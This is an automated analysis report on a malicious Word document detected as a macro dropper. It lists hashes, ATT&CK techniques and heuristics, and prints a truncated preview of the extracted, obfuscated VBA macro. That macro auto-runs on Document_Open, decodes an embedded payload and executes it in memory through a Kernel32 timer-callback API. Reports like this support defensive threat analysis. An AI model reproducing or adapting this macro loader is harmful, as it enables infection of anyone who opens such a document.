Office (OLE) malware analysis — malicious · c9fc8b6b4da58b5e

MALICIOUS

Office (OLE)

335.5 KB Created: 2017-11-22 14:53:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: c3ac6b05f1003adb071ff84c2fdeef10 SHA-1: 43fc0fe3c6c5401d4a56d5f7e25dc58d4d5a878d SHA-256: c9fc8b6b4da58b5e2fb739f171b8d259546370767fbff177f2480211b6b3f602

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6384796-0'. It contains VBA macros, specifically a 'Document_Open' macro that executes automatically using 'GetObject'. This indicates the document is designed to run malicious code upon opening, likely to download and execute a second-stage payload. The presence of VBA macros and the auto-execution mechanism strongly suggest a spearphishing attachment delivery method.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6384796-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6384796-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10816 bytes
SHA-256: `34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function biradial(articulately) As String Dim allantoic(6962) As Byte Dim baroque As Long Dim chimakum As Long Dim despumate() As Byte Dim beanfeast As Long Dim harem(63) As Long Dim barbecue As Long Dim atelier(63) As Long Dim illdigested(63) As Long seeing = 39 - 80 + 65321 aneurysmal = 9 - 112 + 65639 bumper = 7 - 40 + 4129 ectoderm = 45 - 27 + 16711662 Dim capella() As Byte capella = VBA.StrConv(articulately, 128) cooks = 5 + 32 Pmt 0, cooks, 7585, 47529, 8 copaiba = 7840 + 3 finem = vbKeyShift - 12 For unauthoritative = (1 - 1) To copaiba * 1 If unauthoritative Mod (6 - 4) = (3 - 3) Then capella(unauthoritative) = capella(unauthoritative) - finem Else capella(unauthoritative) = capella(unauthoritative) - (finem - 1) End If Next unauthoritative sympathectomy = 11 + 51 Pmt 0, sympathectomy, 25280, 57587, 6 uncertain = 107 - 100 - 7 prionace = 80 - 3 - 34 archegenesis = abolishment For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5) atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5) illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5) Next beanfeast breastfed = 39 + 9 Pmt 0, breastfed, 36651, 54834, 2 despumate = capella grampositive = 18 + 59 Pmt 0, grampositive, 12329, 36386, 3 northwestward = 122 - 24 - 95 enfranchised = 36 - 122 + 88 For barbecue = 0 To copaiba clay = despumate(barbecue) belay = despumate(barbecue + 2) baggala = atelier(archegenesis(despumate(barbecue + 1))) cupronickel = harem(archegenesis(belay)) + _ archegenesis(despumate(barbecue + northwestward)) baroque = illdigested(archegenesis(clay)) + baggala + cupronickel beanfeast = plebiscitum(baroque, ectoderm, 20 + 7) allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7) beanfeast = plebiscitum(baroque, seeing, 20 + 7) allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7) allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7) chimakum = chimakum + enfranchised + 1 barbecue = barbecue + 3 Next biradial = allantoic End Function Function braze() unwelcome.hallucinogen.Value = Day(#12/5/2013#) Set aerobiotic = unwelcome.hallucinogen.SelectedItem symmetry = 51 + 44 Pmt 0, symmetry, 19244, 48842, 8 whim = aerobiotic.Name justly = 50 - 49 + 7843 crenulate = Right(whim, justly) hipless = biradial(crenulate) footwear = 40 + 48 Pmt 0, footwear, 13324, 17438, 6 #If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then Dim upbow As LongPtr Dim seedtime As LongPtr Dim ploy As LongPtr Dim fumble As LongPtr Dim pattern As LongPtr ramshead = 118 - 128 + 2074 #End If #If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then Dim seedtime As Long Dim upbow As Long Dim ploy As Long Dim fumble As Long Dim pattern As Long ramshead = (14 - 25 + 792) + 3459 #End If adaptability = 21 + 13 Pmt 0, adaptability, 2073, 45246, 2 melicoccus = 20 + 37 Pmt 0, melicoccus, 29396, 52316, 4 antibacterial = hipless upbow = morder.malabo(antibacterial) ploy = 102 - 7 - 95 seedtime = upbow + ramshead fumble = 63 - 108 + 201572 pattern = 71 - 80 + 3509 balaenicipitidae = decapitate(fumble, _ ploy, seedtime, _ ploy, ploy, ploy, _ ploy) bonnet = 59 + 1 Pmt 0, bonnet, 13549, 52182, 5 End Function Private Sub Document_Open() remissness = "mate" braze canaliculated = 9 + 19 Pmt 0, canaliculated, 36418, 18210, 5 End Sub Attribute VB_Name = "soave" ' Es ist kalt und regungslos #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then ' Die Nacht A¶ffnet ihren SchoAY ' Ich weiAY nicht wie du heiAYt Public Declare Function decapitate _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (etiolate As ... (truncated)

SHA-256: 34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function biradial(articulately) As String
Dim allantoic(6962) As Byte
Dim baroque As Long
Dim chimakum As Long
Dim despumate() As Byte
Dim beanfeast As Long
Dim harem(63) As Long
Dim barbecue As Long
Dim atelier(63) As Long
Dim illdigested(63) As Long
seeing = 39 - 80 + 65321
aneurysmal = 9 - 112 + 65639
bumper = 7 - 40 + 4129
ectoderm = 45 - 27 + 16711662
Dim capella() As Byte
capella = VBA.StrConv(articulately, 128)
cooks = 5 + 32
Pmt 0, cooks, 7585, 47529, 8
copaiba = 7840 + 3
finem = vbKeyShift - 12
For unauthoritative = (1 - 1) To copaiba * 1
If unauthoritative Mod (6 - 4) = (3 - 3) Then
capella(unauthoritative) = capella(unauthoritative) - finem
Else
capella(unauthoritative) = capella(unauthoritative) - (finem - 1)
End If
Next unauthoritative
sympathectomy = 11 + 51
Pmt 0, sympathectomy, 25280, 57587, 6
uncertain = 107 - 100 - 7
prionace = 80 - 3 - 34
archegenesis = abolishment
For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5)
atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5)
illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5)
Next beanfeast
breastfed = 39 + 9
Pmt 0, breastfed, 36651, 54834, 2
despumate = capella
grampositive = 18 + 59
Pmt 0, grampositive, 12329, 36386, 3
northwestward = 122 - 24 - 95
enfranchised = 36 - 122 + 88
For barbecue = 0 To copaiba
clay = despumate(barbecue)
belay = despumate(barbecue + 2)
baggala = atelier(archegenesis(despumate(barbecue + 1)))
cupronickel = harem(archegenesis(belay)) + _
archegenesis(despumate(barbecue + northwestward))
baroque = illdigested(archegenesis(clay)) + baggala + cupronickel
beanfeast = plebiscitum(baroque, ectoderm, 20 + 7)
allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7)
beanfeast = plebiscitum(baroque, seeing, 20 + 7)
allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7)
allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7)
chimakum = chimakum + enfranchised + 1
barbecue = barbecue + 3
Next
biradial = allantoic
End Function

Function braze()
unwelcome.hallucinogen.Value = Day(#12/5/2013#)
Set aerobiotic = unwelcome.hallucinogen.SelectedItem
symmetry = 51 + 44
Pmt 0, symmetry, 19244, 48842, 8
whim = aerobiotic.Name
justly = 50 - 49 + 7843
crenulate = Right(whim, justly)
hipless = biradial(crenulate)
footwear = 40 + 48
Pmt 0, footwear, 13324, 17438, 6
#If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then
Dim upbow As LongPtr
Dim seedtime As LongPtr
Dim ploy As LongPtr
Dim fumble As LongPtr
Dim pattern As LongPtr
ramshead = 118 - 128 + 2074
#End If
#If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then
Dim seedtime As Long
Dim upbow As Long
Dim ploy As Long
Dim fumble As Long
Dim pattern As Long
ramshead = (14 - 25 + 792) + 3459
#End If
adaptability = 21 + 13
Pmt 0, adaptability, 2073, 45246, 2
melicoccus = 20 + 37
Pmt 0, melicoccus, 29396, 52316, 4
antibacterial = hipless
upbow = morder.malabo(antibacterial)
ploy = 102 - 7 - 95
seedtime = upbow + ramshead
fumble = 63 - 108 + 201572
pattern = 71 - 80 + 3509
balaenicipitidae = decapitate(fumble, _
ploy, seedtime, _
ploy, ploy, ploy, _
ploy)
bonnet = 59 + 1
Pmt 0, bonnet, 13549, 52182, 5
End Function
Private Sub Document_Open()
remissness = "mate"
braze
canaliculated = 9 + 19
Pmt 0, canaliculated, 36418, 18210, 5
End Sub

Attribute VB_Name = "soave"

'  Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Die Nacht A¶ffnet ihren SchoAY
'  Ich weiAY nicht wie du heiAYt
Public Declare Function decapitate _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (etiolate As
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.